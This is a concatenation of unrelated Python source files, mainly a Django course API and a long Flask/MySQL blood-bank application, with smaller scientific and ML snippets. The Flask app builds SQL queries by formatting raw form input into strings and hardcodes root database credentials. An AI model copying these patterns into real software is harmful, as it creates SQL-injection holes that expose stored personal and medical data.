for j in range(len(OROT)):
### below: adding in the requirements for the 'high-z' state ###
if (OROT[j] < -45 or OROT[j] > 140) and z_pos[j] > 4.8:
states[j] = 3
else:
### above: adding in the requirements for the 'high-z' state ###
diff0 = []
for i in range(len(RAS_RAF_macrostate)):
#diff0.append([((RAS_RAF_macrostate[i,0]-OWAS[j])**2+(RAS_RAF_macrostate[i,1]-OROT[j])**2)**0.5, RAS_RAF_macrostate[i,6]])
diff0.append([((RAS_RAF_macrostate[i,1]-OWAS[j])**2+(RAS_RAF_macrostate[i,0]-OROT[j])**2)**0.5, RAS_RAF_macrostate[i,4]])
diff0.sort()
states[j] = diff0[0][1]
###### Above might have to be updated to take into account the periodic nature of the rotation ######
###### Assume we want to remove this? Where is the code that reads this information? i.e. will there be knock-on effects? ######
###### If feedback code needs index 5 (two_states) from the output, deleting this four_states will shift that to index 4 #######
# four_states = np.zeros(len(OROT))
# for j in range(len(OROT)):
# diff0 = []
# for i in range(len(macrostate4)):
# diff0.append([((macrostate4[i,0]-OWAS[j])**2+(macrostate4[i,1]-OROT[j])**2)**0.5, macrostate4[i,6]])
# diff0.sort()
# four_states[j] = diff0[0][1]+1
###### below: old output details.... ######################################
###### Updated - RAS-only to NOT HAVE the Z-distance ######################
###### Updated - Added in the protein 'tag', i.e. RAS-ONLY or RAS-RAF #####
# OUTPUT = np.zeros([len(OROT), 6])
# for i in range(len(OROT)):
# OUTPUT[i] = timeframes[i], OWAS[i], OROT[i], z_pos[i], four_states[i], two_states[i]
###### above: old output details.... ######################################
###### below: NEW output details.... ######################################
if protein_type == 'RAS-ONLY':
OUTPUT = np.zeros([len(OROT), 6]).astype(object)
for i in range(len(OROT)):
OUTPUT[i] = str(protein_type), timeframes[i], OWAS[i], OROT[i], 'n/a', int(states[i])
elif protein_type == 'RAS-RAF':
OUTPUT = np.zeros([len(OROT), 6]).astype(object)
for i in range(len(OROT)):
OUTPUT[i] = str(protein_type), timeframes[i], OWAS[i], OROT[i], z_pos[i], int(states[i])
ALLOUT.append(OUTPUT)
return np.asarray(ALLOUT)
#np.savetxt(str(tpr)+"_tilt_rot_z_state.KRAS_"+str(k+1)+".txt", OUTPUT, fmt=['%i','%10.3f','%10.3f','%10.3f','%i','%i'], delimiter=' ')
|
StarcoderdataPython
|
1717103
|
<filename>src/simmate/toolkit/transformations/coordinate_perturation_ordered.py
# -*- coding: utf-8 -*-
from simmate.toolkit.transformations.base import Transformation
class CoordinateOrderedPerturbation(Transformation):
# known as "coordinate mutation" in USPEX
# site locations are mutated where sites with lower order have higher preference for mutation
# https://uspex-team.org/static/file/USPEX-LargeComplexSystems-2010.pdf
# ""Coordinate mutation was found [2] to be ineffective, because “blind” displacement of the
# atoms is much more likely to decrease the quality of a structure than to increase it.""
#!!! because of the quote above, the coordinate displacement is order-dependent
io_scale = "one_to_one"
ninput = 1
use_multiprocessing = False
def __init__(
self,
):
pass
def apply_transformation(self, structure, max_attempts=100):
return
|
StarcoderdataPython
|
3216898
|
<reponame>glc12125/ML_for_trading
import numpy as np
class BagLearner(object):
def __init__(self, learner, kwargs={"leaf_size":1},bags=20,boost=False, verbose = False):
self.learner=learner
self.learner_list = []
for i in range(0,bags):
self.learner_list.append(learner(**kwargs))
self.bags = bags
# pass # move along, these aren't the drones you're looking for
def author(self):
return 'nmenon34' # replace tb34 with your Georgia Tech username
def addEvidence(self,dataX,dataY):
"""
@summary: Add training data to learner
@param dataX: X values of data to add
@param dataY: the Y training values
"""
index_list = np.linspace(0,dataX.shape[0]-1,dataX.shape[0])
index_list = index_list.astype(int)
for learner in self.learner_list:
index = np.random.choice(index_list,index_list.size)
learner.addEvidence(dataX.take(index,axis=0),dataY.take(index,axis=0))
def query(self,points):
"""
@summary: Estimate a set of test points given the model we built.
@param points: should be a numpy array with each row corresponding to a specific query.
@returns the estimated values according to the saved model.
"""
q=[]
for learner in self.learner_list:
q.append(learner.query(points))
q_array = np.array(q)
ans = np.mean(q_array,axis=0)
return ans.tolist()
if __name__=="__main__":
print "the secret clue is 'zzyzx'"
|
StarcoderdataPython
|
1658698
|
<filename>project_name/utils/__init__.py
from .download_utils import download_from_yaml
from .transform_utils import multi_page_table_to_list, write_node_edge_item
__all__ = [
"download_from_yaml", "multi_page_table_to_list", "write_node_edge_item"
]
|
StarcoderdataPython
|
3326812
|
<reponame>ranwise/djangochannel
from django.core.exceptions import ObjectDoesNotExist
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import permissions
from .models import Category, Course, Task, RealizationTask
from .serializers import (
CategorySerializer,
MinimalCourseSerializer, CourseSerializer, OutputCourseSer, ImageCourseSerializer,
MinimalTaskSerializer, FullTaskSerializer,
MinRealizationTaskSerializer, RealizationTaskSerializer, PatchRealizationTaskSerializer
)
class CategoryList(APIView):
"""Список всех категорий"""
permission_classes = [permissions.AllowAny]
@staticmethod
def get(request):
queryset = Category.objects.all()
serializer = CategorySerializer(queryset, many=True)
return Response({'categories': serializer.data})
class CoursesInCategory(APIView):
"""Список курсов в категории"""
permission_classes = [permissions.AllowAny]
@staticmethod
def get(request):
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
courses = Course.objects.filter(category_id=pk, is_active=True)
except ObjectDoesNotExist:
return Response('Нет категории', status=404)
serializer = ImageCourseSerializer(courses, many=True)
return Response({'courses': serializer.data})
class MyCourses(APIView):
"""Список курсов текущего юзера"""
permission_classes = [permissions.IsAuthenticated]
@staticmethod
def get(request):
courses = Course.objects.filter(students=request.user)
serializer = MinimalCourseSerializer(courses, many=True)
return Response({'courses': serializer.data})
class CourseTasks(APIView):
"""Задания курса"""
permission_classes = [permissions.IsAuthenticated]
@staticmethod
def get(request):
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
course = Course.objects.get(id=pk)
if request.user not in course.students.all():
return Response('Вы не записаны на этот курс', status=403)
course_ser = CourseSerializer(course)
except ObjectDoesNotExist:
return Response('Нет курса', status=404)
tasks = course.tasks.all()
tasks_ser = MinimalTaskSerializer(tasks, many=True)
confirmed, unconfirmed, next_task, status = CompletedTasks().get(request, course_pk=pk)
# Возможные статусы:
# 200 - все ок,
# 400 - нет pk курса,
# 403 - юзер не записан на курс,
# 404 - нет курса.
if status != 200:
return Response(status=status)
return Response({'course': course_ser.data,
'tasks': tasks_ser.data,
'confirmed': confirmed,
'unconfirmed': unconfirmed,
'next': next_task})
class CourseDescription(APIView):
"""Описание курса"""
permission_classes = [permissions.AllowAny]
@staticmethod
def get(request):
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
course = Course.objects.get(id=pk)
except ObjectDoesNotExist:
return Response('Нет курса', status=404)
serializer = OutputCourseSer(course)
return Response({'course': serializer.data})
class Tasks(APIView):
"""
Получение описания задания
и его выполнение/изменение
"""
permission_classes = [permissions.IsAuthenticated]
def get(self, request):
"""Получение описания задания"""
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
if self.check_user(request, pk) is False:
return Response('Это задание недоступно', status=404)
try:
task = Task.objects.get(id=pk)
except ObjectDoesNotExist:
return Response('Нет задания', status=404)
if request.user not in task.course.students.all():
return Response('Вы не записаны на этот курс', status=403)
answer = self.get_realization_task(task, request.user)
task_serializer = FullTaskSerializer(task)
return Response({'task': task_serializer.data,
'realization': answer})
@staticmethod
def get_realization_task(task, user):
"""Получение ответа на задание"""
try:
answer = task.answers.get(student=user)
return RealizationTaskSerializer(answer).data
except ObjectDoesNotExist:
return {}
def post(self, request):
"""Выполнение задания/изменение ответа"""
task_id = request.data.get('task')
if self.check_user(request, task_id) is False:
return Response('Не жульничай', status=404)
try:
answer = RealizationTask.objects.get(id=request.data.get("id"))
serializer = PatchRealizationTaskSerializer(answer, data=request.data)
except:
serializer = MinRealizationTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.save(student=request.user)
else:
return Response(serializer.errors, status=400)
return Response(status=200)
@staticmethod
def check_user(request, task_id):
"""
Проверка юзера на жульничество,
выполнение недоступных заданий
"""
try:
course = Task.objects.get(id=task_id).course
except ObjectDoesNotExist:
return False
next_task = CompletedTasks().get_next_task(request, course_pk=course.id)
if next_task is not None and next_task.id < int(task_id):
return False
return True
class BuyCourse(APIView):
"""Покупка курса"""
# TODO: Пока сделано без каких-либо финансовых манипуляций, просто запись на курс
permission_classes = [permissions.IsAuthenticated]
@staticmethod
def post(request):
pk = request.data.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
course = Course.objects.get(id=pk)
except ObjectDoesNotExist:
return Response('Нет курса', status=404)
if request.user in course.students.all():
return Response('Вы уже записаны на курс {}'.format(course.title), status=422)
course.students.add(request.user)
return Response('Вы записались на курс {}'.format(course.title))
class CompletedTasks:
"""
Получение подтвержденных,
неподтвержденных и следующего на выполнение заданий
"""
def __init__(self):
self.confirmed_tasks = []
self.unconfirmed_tasks = []
self.next_task = None
def get(self, request, **kwargs):
# Получение pk, проверка на его наличие
course_pk = request.GET.get('course_pk')
if not course_pk:
course_pk = kwargs.get('course_pk')
if not course_pk:
return [], [], None, 400
# Получение курса
try:
course = Course.objects.get(id=course_pk)
except ObjectDoesNotExist:
return [], [], None, 404
# Проверка на наличие юзера в учениках курса
if request.user not in course.students.all():
return [], [], None, 403
# Получение подтвержденных заданий
self.confirmed_tasks = self.get_tasks(course, request.user, True)
ser_confirmed_data = MinimalTaskSerializer(self.confirmed_tasks, many=True).data
# Получение неподтвержденных заданий
self.unconfirmed_tasks = self.get_tasks(course, request.user, False)
ser_unconfirmed_data = MinimalTaskSerializer(self.unconfirmed_tasks, many=True).data
# Получение следующего для выполнения задания
self.next_task = Task.objects.filter(
course=course
).exclude(
id__in=[x.id for x in self.confirmed_tasks]
).first()
next_task_data = MinimalTaskSerializer(self.next_task).data if self.next_task else None
return ser_confirmed_data, ser_unconfirmed_data, next_task_data, 200
@staticmethod
def get_tasks(course, user, success):
# TODO: Изменить запрос на более правильный
answers = RealizationTask.objects.filter(
task__course=course, student=user, success=success)
return [x.task for x in answers]
def get_next_task(self, request, **kwargs):
self.get(request, **kwargs)
return self.next_task
|
StarcoderdataPython
|
1674033
|
<reponame>asbe/PoseCNN<gh_stars>0
import tensorflow as tf
from tensorflow.python.framework import ops
from . import hard_label_op
@ops.RegisterShape("Hardlabel")
def _hard_label_shape(op):
output_shape = op.inputs[0].get_shape()
return [output_shape]
@ops.RegisterGradient("Hardlabel")
def _hard_label_grad(op, grad):
bottom_prob = op.inputs[0]
bottom_gt = op.inputs[1]
threshold = op.get_attr('threshold')
# compute gradient
data_grad_prob, data_grad_gt = hard_label_op.hard_label_grad(bottom_prob, bottom_gt, grad, threshold)
return [data_grad_prob, data_grad_gt]
|
StarcoderdataPython
|
14629
|
from django.db.models.signals import m2m_changed
from django.dispatch import receiver
from .models import Image
@receiver(m2m_changed, sender=Image.users_likes.through)
def users_like_changed(sender, instance, **kwargs):
instance.total_likes = instance.users_likes.count()
instance.save()
|
StarcoderdataPython
|
4833249
|
<reponame>elsholz/PyMarkAuth
class Lines:
def __init__(self, *args):
c = ['\n']
for arg in args:
c.extend(['\n', arg])
c.extend(['\n'])
self.elements = c
def __str__(self):
return ''.join(str(x) for x in self.elements)
class Paragraphs:
def __init__(self, *args):
c = ['\n']
for arg in args:
c.extend(['\n\n', arg])
c.extend(['\n'])
self.elements = c
def __str__(self):
return ''.join(str(x) for x in self.elements)
class BlankSeparated:
def __init__(self, *args):
self.elements = args
def __str__(self):
return ' '.join(str(x) for x in self.elements)
|
StarcoderdataPython
|
1730781
|
from pymongo import MongoClient
client = MongoClient()
db = client.crandom
joke = {
"content": "从前有只麋鹿,它在森林里玩儿,不小心走丢了。于是它给它的好朋友长颈鹿打电话:“喂…我迷路啦。”长颈鹿听见了回答说:“喂,我长颈鹿啦~”",
"answer": "",
# "author": "",
# "via": "豆瓣",
# "via_url": "http://jandan.net/",
"rank": 5,
}
result = db.joke.insert_one(joke)
print(result.inserted_id)
|
StarcoderdataPython
|
3324463
|
from psypose.MEVA.meva.khrylib.utils.math import *
def get_body_qposaddr(model):
body_qposaddr = dict()
for i, body_name in enumerate(model.body_names):
start_joint = model.body_jntadr[i]
if start_joint < 0:
continue
end_joint = start_joint + model.body_jntnum[i]
start_qposaddr = model.jnt_qposadr[start_joint]
if end_joint < len(model.jnt_qposadr):
end_qposaddr = model.jnt_qposadr[end_joint]
else:
end_qposaddr = model.nq
body_qposaddr[body_name] = (start_qposaddr, end_qposaddr)
return body_qposaddr
def align_human_state(qpos, qvel, ref_qpos):
qpos[:2] = ref_qpos[:2]
hq = get_heading_q(ref_qpos[3:7])
qpos[3:7] = quaternion_multiply(hq, qpos[3:7])
qvel[:3] = quat_mul_vec(hq, qvel[:3])
def get_traj_pos(orig_traj):
traj_pos = orig_traj[:, 2:].copy()
for i in range(traj_pos.shape[0]):
traj_pos[i, 1:5] = de_heading(traj_pos[i, 1:5])
return traj_pos
def get_traj_vel(orig_traj, dt):
traj_vel = []
for i in range(orig_traj.shape[0] - 1):
vel = get_qvel_fd(orig_traj[i, :], orig_traj[i + 1, :], dt, 'heading')
traj_vel.append(vel)
traj_vel.append(traj_vel[-1].copy())
traj_vel = np.vstack(traj_vel)
return traj_vel
|
StarcoderdataPython
|
1722446
|
<gh_stars>0
from flask import Flask, render_template, json, request
from flaskext.mysql import MySQL
import mysql.connector
############# Helper functions
def delete_query(conn,cursor, table_name, col_name, ID):
query= "DELETE FROM {t} WHERE {c}={i}".format(t=table_name, c=col_name, i=ID)
cursor.execute(query)
conn.commit()
def make_list(known_values, problematic_values):
#known values is already a tuple. problematic values is a list.
list_of_tuples=[]
while None in problematic_values or "" in problematic_values:
if None in problematic_values:
problematic_values.remove(None)
if "" in problematic_values:
problematic_values.remove("")
for x in problematic_values:
list_of_tuples.append(known_values+(x,))
return list_of_tuples
def insert_query(conn, cursor, data, columns, table_name):
str_data="("
for x in data:
if type(x) is str:
str_data+= "'%s'" % x +","
continue
str_data+= str(x)+","
str_data=str_data[0:len(str_data)-1]+")"
query= "INSERT INTO {} {}".format(table_name, columns) +" "+"VALUES {}".format(str_data)
cursor.execute(query)
conn.commit()
def GetMaxID(conn, cursor, table_name, col_name): #get max ID of Acceptor/Donor, Flag=1= Donor, 2= Donor 3= Acceptor, 4= Blood Drive, 5= Sample, 6= Issue, 7= Pending Req
# Take table_name, id_col name and just %s it fam no need of flag
# needs connection and cursor object to MySQL as well. Returns 0 if null
query= ("SELECT IF (not exists(select {0} from {1} where {0}=1), 1,0)".format(col_name,table_name))
cursor.execute(query)
conn.commit()
result= cursor.fetchone()[0]
bank_id=0
if result==1:
bank_id=1
else:
query2= ("SELECT MAX({}) from {}".format(col_name,table_name))
cursor.execute(query2)
conn.commit()
bank_id= (cursor.fetchone()[0])
bank_id+=1
return bank_id
def get_ID(conn,cursor,table_name,col_name, condition_col, condition):
query= ("SELECT IF ( exists(select {0} from {1} where {2}={3}),1,0)".format(col_name,table_name,condition_col,condition))
cursor.execute(query)
conn.commit()
result= cursor.fetchone()
print (result)
if result[0]==1:
query= ("select {0} from {1} where {2}={3}".format(col_name,table_name,condition_col,condition))
cursor.execute(query)
conn.commit()
result1=cursor.fetchall()
result=[]
for i in result1:
result.append(i[0])
return tuple(result)
else:
return ()
############################################ starting flask app and connecting to MySQL
app = Flask(__name__)
mysql = MySQL()
_name=None
_email=None
_password=<PASSWORD>
data=None
app.config['MYSQL_DATABASE_USER'] = 'root'
app.config['MYSQL_DATABASE_PASSWORD'] = 'root'
app.config['MYSQL_DATABASE_DB'] = 'BBANK'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
######################### view functions
@app.route ("/SampleReq/<option>", methods=['GET','POST'])
def SampleReq(option):
if option=="Sample":
return render_template('IssueSample.html', who='Sample', redirect="/InsertBlood/Sample")
elif option=="Request":
return render_template('IssueSample.html', who='Request', redirect="/InsertBlood/Request")
#############################################################################################
@app.route("/InsertBlood/<option>", methods=['POST'])
def InsertBlood(option):
date=request.form['Date']
ID=None
conn= mysql.connect()
cursor= conn.cursor()
ID1=None
if option=="Sample":
ID= request.form['donorID']
ID1= GetMaxID(conn,cursor,table_name, col_name)
table_name="blood_sample"
col_name="sample_id"
columns1="(sample_id,date_of_sample)"
ID1=GetMaxID(conn,cursor,table_name,col_name)
data1=(ID1,date)
columns="(sample_id, donor_id)"
data=(ID1, ID)
insert_query(conn,cursor,data,columns, table_name)
insert_query(conn,cursor,data1,columns1, "sample_dates")
query= R"SELECT blood_donor.donor_id, blood_acceptor.acceptor_id, pending_requests.Request_ID, pending_requests.DateOfRequest, blood_acceptor.blood_type from blood_donor inner join blood_acceptor inner join pending_requests on blood_donor.blood_type=blood_acceptor.blood_type and blood_acceptor.acceptor_id= pending_requests.acceptor_id"
cursor.execute(query)
conn.commit()
result= cursor.fetchall()
req_id=None
acceptor_id=None
date=""
print(ID)
print(type(ID))
if result[0][0]==None or result[0][0]=="":
for x in result:
print(type(x[0]))
if int(ID)==(x[0]):
print(x[0])
req_id=x[2]
acceptor_id=x[1]
date=x[3]
break
print(acceptor_id)
ID2= GetMaxID(conn,cursor,"Blood_issued", "issue_id")
insert_query(conn,cursor, (ID2, ID , acceptor_id), "(issue_id,donor_id,acceptor_id)", "Blood_issued")
insert_query(conn,cursor, (ID2,date), "(issue_id, dateofissue)", "issued_dates")
delete_query(conn,cursor, "blood_sample", "sample_id", ID1)
delete_query(conn,cursor, "pending_requests", "request_id", req_id)
elif option=="Request":
ID=request.form['AcceptorID']
table_name="Pending_requests"
col_name="request_id"
columns1=("sample_id","date_of_sample")
ID1=GetMaxID(conn,cursor,table_name,col_name)
data1=(ID1,date)
columns="(request_id, acceptor_id, dateofrequest)"
data=(ID1, ID, date)
# request table is ready to be inserted.
query="SELECT blood_type FROM blood_acceptor where acceptor_id={}".format(ID)
cursor.execute(query)
conn.commit()
blood_group=cursor.fetchone()[0]
query=R"SELECT IF ( EXISTS (SELECT blood_donor.donor_id from blood_donor INNER JOIN blood_sample ON blood_donor.donor_id=blood_sample.donor_id where"+ " blood_type= '{}'),1,0)".format(blood_group)
cursor.execute(query)
conn.commit()
check=cursor.fetchone()[0]
if check==0:
insert_query(conn,cursor,data,columns, table_name)
return "<h1> Request Added </h1"
else:
query=R"SELECT blood_donor.donor_id from blood_donor INNER JOIN blood_sample ON blood_donor.donor_id=blood_sample.donor_id where"+ " blood_type= '{}'".format(blood_group)
print(query)
cursor.execute(query)
conn.commit()
donor_id=cursor.fetchone()[0]
ID1=GetMaxID(conn,cursor,"Blood_issued","issue_id")
query= "SELECT sample_id from blood_sample where donor_id={}".format(donor_id)
cursor.execute(query)
conn.commit()
sample_id=cursor.fetchone()[0]
columns="(issue_id,donor_id,acceptor_id)"
data=(ID1, donor_id, ID)
insert_query(conn,cursor,data,columns, "Blood_issued")
insert_query(conn,cursor,(ID1,date), "(issue_id, dateofissue)", "issued_dates")
delete_query(conn,cursor, "blood_sample", "sample_id", sample_id)
delete_query(conn,cursor,table_name,"request_id", )
return "<h1> Request fulfilled. Blood Issued. Issue ID: {} </h1>".format(ID1)
return render_template('return.html', myvar='insert', ID=ID1)
#######################################################################################################
@app.route("/Querie")
def Querie():
return render_template('Queries.html')
######################################################################################
@app.route("/InsertDrive", methods=['POST']) #Insert a Blood Drive
def InsertDrive():
bank_id, location= request.form['bankID'], request.form['Location']
start_date= request.form['SD']
end_date= request.form['ED']
conn= mysql.connect()
cursor=conn.cursor()
drive_id= GetMaxID(conn, cursor, "blood_drive", "drive_id")
data= (drive_id,bank_id,location, start_date, end_date)
columns= "(drive_id, bank_id, location, starting_date, ending_date)"
insert_query(conn,cursor,data,columns,"blood_drive")
return render_template('return.html', myvar= 'insert', ID=drive_id)
######################################################################################################################### Insert a Drive Donor
@app.route("/Insert_Drive_Donor", methods=['POST'])
def Insert_Drive_Donor():
drive_id, fname, gender, dob, BT= request.form['ID'], request.form['Fname'], request.form['gender'], request.form['dob'], request.form['BT']
donation_date=request.form['DD']
conn=mysql.connect()
cursor=conn.cursor()
donor_id= GetMaxID(conn,cursor,"blood_drive_donor","drive_donor_id")
data= (donor_id,drive_id,fname,gender,dob,BT,donation_date)
columns= "(drive_donor_id, drive_id, full_name, gender, dateofbirth, blood_type,donation_date)"
insert_query(conn,cursor,data,columns, "blood_drive_donor")
return render_template('return.html', myvar='insert', ID=donor_id)
######################################################################################################################### Insert an Acceptor
@app.route("/UpdatePerson", methods=['POST'])
def UpdatePerson():
return "<h1> IN PROGRESS</h1>"
############################################################################################################################### Insert a Donor
@app.route("/InsertPerson/<option>", methods=['POST'])
def InsertPerson(option):
table_name1,table_name2,table_name3,table_name4,table_name5,table_name6= (None,)*6
col_name=None
print(option)
columns_1, columns_2, columns_3, columns_4, columns_5= (None,)*5
if option.find("Acceptor")>=0:
table_name1,table_name2,table_name3,table_name4,table_name5= "blood_acceptor", "acceptor_email", "acceptor_address","acceptor_contact", "acceptor_bank"
table_name6="acceptor_diseases"
columns_1="(acceptor_id, full_name, gender, weight, blood_type, dateofbirth)"
columns_2="(acceptor_id, email)"
columns_3="(acceptor_id,address)"
columns_4="(acceptor_id,contact)"
columns_5="(acceptor_id,bank_id)"
col_name='acceptor_id'
columns_6="(acceptor_id,disease_id)"
else:
table_name1,table_name2,table_name3,table_name4,table_name5= "blood_donor", "donor_email", "donor_address","donor_contact", "donor_bank"
table_name6="donor_diseases"
columns_1="(donor_id, full_name, gender, weight, blood_type, dateofbirth)"
columns_2="(donor_id, email)"
columns_3="(donor_id,address)"
columns_4="(donor_id,contact)"
columns_5="(donor_id,bank_id)"
col_name='donor_id'
columns_6="(donor_id,disease_id)"
banks, full_name, gender, blood_type, weight, dob= request.form['banks'], request.form['inputfullname'], request.form['Gender'], request.form['BT'], request.form['WT'], request.form['DOB']
email1, email2, addr1, addr2, contact1, contact2= request.form['E1'], request.form['E2'], request.form['A1'], request.form['A2'], request.form['C1'], request.form['C2']
conn = mysql.connect()
cursor=conn.cursor()
Id=GetMaxID(conn, cursor, table_name1, col_name)
data=(Id, full_name, gender, weight, blood_type, dob)
data_email= make_list((Id,), [email1,email2])
data_addr= make_list((Id,), [addr1,addr2])
data_contact= make_list((Id,), [contact1,contact2])
banks= banks.split()
banks= [int(x) for x in banks]
data_bank= make_list((Id,), banks)
if option.find('Update')>=0:
Id= request.form['pk']
update_query(conn,cursor,data,columns_1,table_name1)
insert_query(conn,cursor,data,columns_1,table_name1)
d1= request.form.getlist('disease')
d1= [int(x[1]) for x in d1]
data_disease= make_list((Id,), d1)
if len(data_disease)==0:
insert_query(conn,cursor,(Id,0),columns_6,table_name6)
else:
for x in data_disease:
insert_query(conn, cursor, x, columns_6, table_name6)
for x in data_addr:
insert_query(conn, cursor,x, columns_3,table_name3)
for x in data_contact:
insert_query(conn,cursor,x, columns_4, table_name4)
for x in data_email:
insert_query(conn,cursor,x,columns_2,table_name2)
for x in data_bank:
insert_query(conn, cursor,x, columns_5, table_name5)
return render_template('return.html', myvar= 'insert', ID=Id)
# get the input. we need to put in big SQL queries to insert in each of the normalized tables.
########################################################################################################### Insert a bank
@app.route("/InsertBank", methods=['POST'])
def InsertBank():
bank_addr= request.form['inputbankaddress']
bank_city= request.form['inputCity']
query= ("SELECT IF (not exists(select {0} from {1} where {0}=1), 1,0)".format('bank_id','blood_bank'))
conn = mysql.connect()
cursor= conn.cursor()
cursor.execute(query)
conn.commit()
result= cursor.fetchone()[0]
bank_id=GetMaxID(conn,cursor,'blood_bank', 'bank_id')
return "<h1> %s </h1>" % result
query= ("INSERT INTO blood_bank (bank_id, address, city, `A+`, `A-`, `B+`, `B-`, `AB+`, `AB-`, `O+`, `O-`)"
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
)
cursor.execute(query, (bank_id,bank_addr,bank_city,0,0,0,0,0,0,0,0))
conn.commit()
return render_template('return.html', myvar='insert', ID=bank_id)
################################################################################################ Delete
@app.route("/deletegeneral/<option>", methods=['POST'])
def deletegeneral(option):
ID= request.form['ID']
conn=mysql.connect()
cursor=conn.cursor()
col_name= option[ option.find('_')+1: ]+"_id"
donor_id=get_ID(conn,cursor,"donor_bank","donor_id",col_name, ID)
print (donor_id)
acceptor_id=get_ID(conn,cursor,"acceptor_bank","acceptor_id",col_name, ID)
delete_query(conn,cursor,option,col_name, ID)
if donor_id!=():
return "HALO"
for x in donor_id:
check= get_ID(conn,cursor,"donor_bank","bank_id","donor_id",x)
if check==():
delete_query(conn,cursor,"blood_donor", "donor_id", x)
if acceptor_id!=():
return "HALO"
for x in acceptor_id:
check= get_ID(conn,cursor,"acceptor_bank","bank_id","acceptor_id",x)
if check==():
delete_query(conn,cursor,"blood_acceptor", "acceptor_id", x)
return render_template('return.html', myvar='delete', ID=ID)
@app.route("/Delete")
def delete():
return render_template('insert.html', flag='delete', redirect= '/Menu/Delete')
@app.route("/Search")
def Search():
return "<h1> IN PROGRESS</h1>"
@app.route("/Update")
def Update():
return render_template('insert.html', flag= 'Update', redirect='/Menu/Update')
@app.route("/")
def appp():
return render_template('index.html')
@app.route('/Insert')
def Insert():
return render_template('insert.html', flag='Insert', redirect='/Menu/Insert')
@app.route("/main")
def m1():
return appp()
@app.route("/show")
def show():
return data
@app.route("/Q4inter")
def Q4inter():
return render_template('query4.html')
@app.route("/Q4",methods=['POST'])
def Q4():
gender= request.form["Gender"]
blood_type= request.form["BT"]
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query4', ('%s'%gender, '%s'%blood_type))
result=cursor.fetchall()
final=[]
print(result)
if result==() or result=="":
final.append( "The Query returned an Empty Table")
else:
for x in result:
final.append(x[0])
return render_template('return.html', myvar='Query 4', list=final)
@app.route("/Q5inter")
def Q5inter():
return render_template('query5.html')
@app.route("/Q5", methods=['POST'])
def Q5():
bank_id= request.form["bankid"]
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query5A', (bank_id,))
result_min= cursor.fetchone()
final_min=[result_min[1], result_min[0]]
cursor.callproc('Query5B', (bank_id,))
result_max= cursor.fetchone()
final_max=[result_max[1], result_max[0]]
return render_template('return.html', myvar="Query 5", list=[final_min,final_max])
@app.route("/Q6")
def Q6():
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query6')
result= cursor.fetchall()
if result==() or result=="" :
result=[["The Query returned an empty table"]]
return render_template('return.html', myvar='Query 6', list= result, len= len(result[0]))
@app.route("/Q7")
def Q7():
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query7')
result= cursor.fetchall()
if result==() or result=="" :
result=[["The Query returned an empty table"]]
return render_template('return.html', myvar='Query 7', list= result, len= len(result[0]))
@app.route("/Q8")
def Q8():
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query8')
result= cursor.fetchone()
final=[result[1],result[0]]
return render_template('return.html', myvar= 'Query 8', list= final)
@app.route("/Q9")
def Q9():
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query9')
result= cursor.fetchall()
final=[]
print(result)
if result==() or result=="":
final.append( "The Query returned an Empty Table")
else:
for x in result:
final.append(x[0])
print(final)
return render_template('return.html', myvar="Query 9", list=final)
@app.route("/Q10")
def Q10():
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query10')
result= cursor.fetchone()
final=[]
print(result)
if result[0]==None or result[0]=="":
final.append( "The Query returned an Empty Table")
else:
final=list(result)
print(final)
return render_template('return.html', myvar="Query 10", list=final)
######################################################
@app.route("/Q2inter")
def Q2inter():
return render_template('query2.html')
@app.route("/Q2", methods=['POST'])
def Q2():
starting_date= request.form['startingdate']
ending_date=request.form['endingdate']
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query2', ('%s'%starting_date,'%s' % ending_date))
result= cursor.fetchall()
print(result)
final_col1="times donated"
final_col2="<NAME>"
final_col3="<NAME>"
if result==() or result=="" :
result=[["The Query returned an empty table"]]
return render_template('return.html',myvar='Query 2', list=result, len=len(result[0]))
########################################################################3
@app.route("/Q3inter")
def Q3inter():
return render_template("query3.html")
@app.route("/Q3", methods=['POST'])
def Q3():
starting_date= request.form['startingdate']
ending_date=request.form['endingdate']
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query3', ('%s'%starting_date,'%s' % ending_date))
result= cursor.fetchall()
final=[]
print(result)
if result[0][0]==None or result[0][0]=="":
final.append( "The Query returned an Empty Table")
else:
for x in result:
final.append(x[0])
print(final)
return render_template('return.html', myvar="Query 3", list=final)
####################################
#Query 1
@app.route("/Q1inter")
def Q1inter():
return render_template("Q1.html")
@app.route("/Q1",methods=['POST'])
def Q1():
disease_id= request.form['D_ID']
conn= mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query1',(disease_id,))
result= cursor.fetchone()[0]
return render_template('return.html', myvar= "Query 1", list=result)
#######################################
@app.route('/Menu/<option>', methods=['POST'])
def Menu(option):
resp=(request.form["options"])
if option=="Insert":
if resp=="Blood Bank":
return render_template('create_bank.html')
elif resp=="Blood Donor":
return render_template('create_donor.html', who='Donor', redirect="/InsertPerson/Donor")
elif resp=="Blood Acceptor":
return render_template('create_donor.html', who='Acceptor',redirect="/InsertPerson/Acceptor" )
elif resp=="Blood Drive":
return render_template('blood_drive.html')
elif resp=="Blood Drive Donor":
return render_template('blood_drive_donor.html')
##########################################################
elif option=="Delete":
if resp=="Blood Bank":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_bank')
elif resp=="Blood Donor":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_donor')
elif resp=="Blood Acceptor":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_acceptor' )
elif resp=="Blood Drive":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_drive')
